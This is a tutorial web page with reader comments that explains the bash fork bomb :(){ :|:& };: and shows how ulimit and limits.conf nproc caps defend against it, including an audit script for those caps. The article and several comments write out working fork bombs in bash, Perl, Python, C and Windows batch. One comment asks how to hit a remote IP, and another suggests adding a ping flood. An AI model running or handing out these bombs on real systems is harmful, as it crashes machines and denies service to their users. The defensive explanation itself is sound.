Understanding Bash fork() Bomb :(){ :|:& };: code

Can you explain the following bash code or bash fork() bomb code?
:(){ :|:& };:

The fork bomb is a form of denial-of-service (DoS) attack against a Linux or Unix-based system. It makes use of the fork operation. The :(){ :|:& };: is nothing but a bash function that gets executed recursively. Sysadmins often use it to test user process limits on a server. Linux process limits can be configured via /etc/security/limits.conf and PAM to defend against a bash fork() bomb. Once a fork bomb has been activated on a system, it may not be possible to resume normal operation without rebooting, as the only solution to a fork bomb is to destroy all instances of it.


WARNING! These examples may crash your computer if executed.

Understanding :(){ :|:& };: fork() bomb code

:() – Defines the function called :. This function accepts no arguments. The syntax for a bash function is as follows:

foo(){
 arg1=$1
 arg2=$2
 echo 'Bar..'
 #do_something on $arg argument
}

fork() bomb is defined as follows:

:(){
 :|:&
};:

:|: – Next, the function calls itself using the programming technique called recursion and pipes the output to another call of the function ‘:’. The worst part is that the function gets called two times to bomb your system.

& – Puts the function call in the background so the child cannot die at all and starts eating system resources.

; – Terminates the function definition.

: – Calls (runs) the function, aka sets off the fork() bomb.

Here is a more human-readable version of the code:

bomb() { 
 bomb | bomb &
}; bomb

A properly configured Linux / UNIX box should not go down when a fork() bomb is set off. See comment # 5 below for more fork bomb examples written in Perl, Windows XP (batch) and C.

Related: How to: Prevent a fork bomb by limiting user process under Linux.

Preventing fork bomb on Linux

Type the following ulimit command to find out the current maximum processes you can run on Linux:
ulimit -u
OR
ulimit -a
The number 128038 indicates that you can run 128038 processes. To protect your Linux system from a fork bomb, you need to lower that number. To limit your session to 5000 processes, use the following command:
ulimit -S -u 5000

WARNING! Please don’t set ulimit numbers too low. This will prevent you from working on your system.

Now run fork bomb again:
:(){ :|:& };:
And you will see messages as follows:

bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable

You just avoided a fork bomb on Linux. Run the following pgrep command to count your current threads against that limit:
pgrep -wcu $USER
Sample outputs:

5002
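
The ulimit -S -u command above sets only a soft limit for the current shell, which the user can raise again up to the hard limit; a lasting cap comes from the nproc entries in /etc/security/limits.conf mentioned at the top. The following is an added example, not part of the original article: it audits limits.conf-format text for nproc entries that are soft-only, unlimited, or missing a wildcard hard cap. The function names, finding labels and sample file are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: audit nproc entries in limits.conf-format text read on stdin.
# pam_limits line format: <domain> <type> <item> <value>
audit_nproc() {
  awk '
    NF < 4 || $1 ~ /^#/ { next }        # skip blanks, comments, short lines
    $3 != "nproc"       { next }        # only the process/thread cap
    {
      dom = $1; type = $2; val = $4
      if (!(dom in seen)) { seen[dom] = 1; order[++n] = dom }
      if (val == "unlimited" || val == "infinity" || val == "-1") unl[dom] = 1
      if (type == "hard" || type == "-") hard[dom] = val  # "-" sets both
      if (type == "soft" || type == "-") soft[dom] = val
    }
    END {
      for (i = 1; i <= n; i++) {
        d = order[i]
        if (d in unl)          print "UNLIMITED " d
        else if (!(d in hard)) print "SOFT_ONLY " d " soft=" soft[d]
        else                   print "OK " d " hard=" hard[d]
      }
      # without a capped wildcard hard entry, unlisted accounts have no explicit ceiling
      if (!("*" in hard) || ("*" in unl)) print "NO_DEFAULT_HARD_CAP"
    }'
}

# Constructed sample, not taken from a real host.
sample_limits() {
  cat <<'EOF'
# <domain>  <type>  <item>  <value>
*           soft    nproc   5000
@dev        hard    nproc   2000
@dev        soft    nproc   1500
svc_build   -       nproc   unlimited
alice       -       nproc   300
*           hard    core    0
EOF
}

sample_limits | audit_nproc
```

On a real host, pipe in /etc/security/limits.conf together with the files under /etc/security/limits.d/. Keep in mind that pam_limits does not apply wildcard and group limits to root.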
32 comments
  • mastrboy Nov 26, 2007 @ 9:53

    I tested this on a fresh install of CentOS and it totally crashed :P

    How about a nice “howto” for protecting against these attacks?

  • raj Nov 27, 2007 @ 0:01

    I second the vote for a nice howto.

    Cheers

  • queue Nov 27, 2007 @ 17:02

    Thirded!

    How to prevent a “fork bomb”.

  • Bharat Nov 28, 2007 @ 1:19

    Yes How to must be started, for the benefits of the innocent users, as the viruses are spread by entities whose brains are configured differently.

  • l33t Nov 28, 2007 @ 9:09

    Perl example:

    perl -e "fork while fork" &

    Python example:

    import os
    while(1):
        os.fork()

    Windows XP / Vista bat file example:

    :bomb
    start %0
    goto bomb

    UNIX style for Windows:

    %0|%0

    C program example:

    #include <unistd.h>
    int main() { while(1) fork(); }

    Plz note that the fork bomb is a form of denial of service, so don’t run on production or unauthorized system.

  • Ofloo Nov 28, 2007 @ 11:42

    Another one is that when you have set a quota for your mailboxes and crontab is generating mail over and over, eventually the quota will be exceeded; after a while the mailq will fill up with 1000’s of mails and the system will crash.

  • kunal Nov 28, 2007 @ 11:52

    Hi,

    I run it on my testing server and it starts consuming my server processes.
    So one thing is clear from this fork bomb: it starts issuing new processes rather than threads.

    How do we prevent our sites from such fork attacks?

    Thanks in advance

    • Toni Kingo Jan 5, 2013 @ 18:39

      Yes. And when I don’t tie my shoe laces, I can fall…

      And, and, … And, … when I eat too much, I get stomach ache

  • 🐧 nixCraft Nov 28, 2007 @ 12:56
  • Bash Nov 28, 2007 @ 14:27

    I tried this on a virtual instance of SLAX, and it totally killed it.

  • bort Dec 5, 2007 @ 16:21

    perl inline…

    perl -e "fork while fork" &

  • ATOzTOA Jan 30, 2008 @ 4:15

    Sleek code :)

    I tried on FC4. Took only 1 minute as root.

    In WinXP, I waited till 7 minutes. Displayed some errors and all, but was responding. Tried MS Word, Task Manager, nothing could be executed. The machine was useless until reset.

  • bradley Mar 31, 2008 @ 18:06

    This works very quickly on all windows:

    :bomb
    %0 | %0
    goto bomb

  • Joe Nov 13, 2008 @ 23:04

    This works faster on all windows:

    :bomb
    start %0
    %0|%0
    goto bomb

  • sharfah Nov 22, 2008 @ 14:42

    A fork bomb process which can no longer fork exits. The following short Z Shell code will typically get rid of the above fork bomb in about a minute:

    while (sleep 100 &!) do; done

    It keeps trying and will eventually start a new do-nothing process; Each new do-nothing process reduces the number of rampant “fork bomb” processes by one, until eventually all of them are eradicated, at which point the do-nothing processes can exit.

  • stealth Aug 29, 2009 @ 21:00

    Use ulimit -u 30 (where 30 is the max number of processes) to protect yourself from this attack (or configure your limits.conf).

  • Peter Sep 28, 2009 @ 15:55

    That would make a VERY geeky tattoo.

    :(){ :|:& };:

  • Edward Oct 17, 2009 @ 13:20

    This did 100% of nothing on my AuroraUX^ machine.
    Load went up for about min to min and a half, then the kernel killed the process for me.
    Silly Linux..

    • PyrexKidd Jun 17, 2010 @ 18:15

      On my Ubuntu 10.04 LTS the fork bomb launched about 2500 processes and then my kernel killed it. Total time ~< 5 min.

  • Marc Nov 20, 2009 @ 18:33

    How would I send a forkbomb/ebomb to an IP without requiring passwords, like the ones controlled by keys, when you simultaneously press keys it opens up stuff on the target’s IP.

  • Victor Chaves Aug 12, 2010 @ 19:31

    Debian 5 is immune to this fork bomb.

  • newklear Nov 17, 2010 @ 20:25

    PCLinuxOS is immune

  • Änönymöüs Jan 11, 2011 @ 16:26

    WARNING! These examples may crash your computer if executed.

    may?
    They WILL crash your comp.
    Win7 – batch WILL kill (also input lag)

  • Ellisgeek Mar 4, 2011 @ 1:22

    try this on for (lack) of size:

    #/bin/bash
    $0&
    $0
    

    Very tiny fork bomb :D

  • modchan Oct 7, 2011 @ 10:47

    Tried on Mac OS X 10.7.1 from root, bomb was killed in 0.003 s.

  • Tryme Dec 1, 2011 @ 15:52
    :(){ : | : & }; : 
    • :() is a function name with the open and close parenthesis representing no parameters. The body of this function is within the braces {}.
    • : | : is a recursive call since : is the name of the function. The function gets called twice and is piping input from one call to the other.
    • & backgrounds the previous function call so that it will not die.
    • ; finishes the function declaration.
    • : Calls the function just defined.
  • StarDust Jan 6, 2012 @ 11:52

    I did the %0|%0 command in Windows XP. Type into Notepad and saved as FORKBOMB.BAT then double-clicked. Fortunately, I already had task manager running, so I right-clicked explorer and hit “end process tree” which left me with a blank desktop. I then used Alt+Ctrl+Del to reopen Task Manager and from there, typed explorer.exe in the RUN dialog to get Windows back up without rebooting.

    If you add an additional command, for example:

    PING [insert url of hated website]

    you can spam out DOS attacks as well while you watch your computer crash. Seriously people, don’t do that…

  • Stephen Wood Jul 24, 2012 @ 23:15

    It’s almost a rite of passage to get tricked into running this command when you get your first system. Part of unwinding why your system just crashed actually teaches you quite a bit about unix pipes.

    For that reason I’m partly sad that in at least Ubuntu 12.04, the default ulimit setting prevents the bomb from taking down the system.

  • mark Feb 25, 2014 @ 22:36

    There is a minimal “cure” for this.

    Classic REISUB Linux magic key combo always works for rebooting computer, however, using Alt+SysRq+K will stop all processes on current tty. In the case it doesn’t work, probably you’re on X server and need to use Alt+SysRq+RK.

  • sugatang itlog Jul 22, 2014 @ 15:18

    Ahihi! CoreOS is immune. Though the system was unresponsive for 2 minutes.

    • sugatang itlog Jul 22, 2014 @ 15:33

      Ooops! Totally crashed. fork: Cannot allocate memory. Then Call Trace. Then, not responding to anything, just call trace. Awesome! Is this second to vmsplice?

      More power nixCraft!

  • John Drake Sep 9, 2017 @ 13:06

    Why can you create a function named : at all?

    :(){ echo colonfunc; }
    :
    colonfunc

    This works in an interactive shell, but not if you put this into a script.
    cat <<NNNN > colon.sh
    #!/bin/sh
    :(){ echo colonfunc; }
    :
    NNNN
    chmod +x colon.sh
    ./colon.sh
    ./colon.sh: line 2: `:': not a valid identifier

    This is what I would expect.
    I’ve noticed some but not all versions of bash also allow you to use:
    * @ , ? . + - =
    and other punctuation characters as shell function names.

    % @(){ echo colonfunc; }
    bash: syntax error near unexpected token `}'

    This behavior I would expect. However, try this on my OSX Macbook:
    % @(){ echo colonfunc; }
    % @
    colonfunc

    This is strange, it worked.

    What is the difference? Bash versions.
    @ works with:
    GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin16)
    @ does not work with:
    GNU bash, version 4.2.25(1)-release (x86_64-pc-linux-gnu)

    Even worse, you can call some functions with punctuation names, but you cannot call them as functions. You can list shell functions with “set | less”. Now search /colonfunc in less for all of the shell functions:

    % () 
    { 
        echo colonfunc
    }
    , () 
    { 
        echo colonfunc
    }
    . () 
    { 
        echo colonfunc
    }
    = () 
    { 
        echo colonfunc
    }

    % is a function, but you cannot call it.

    % %
    bash: fg: %: no such job

    But this works just fine:
    % =
    colonfunc

    This behavior varies between versions of bash. The fact that the shell does allow some punctuation characters as function names seems like a bug. The fact that not all versions of bash allow the same set of punctuation characters as function names seems to verify this theory.
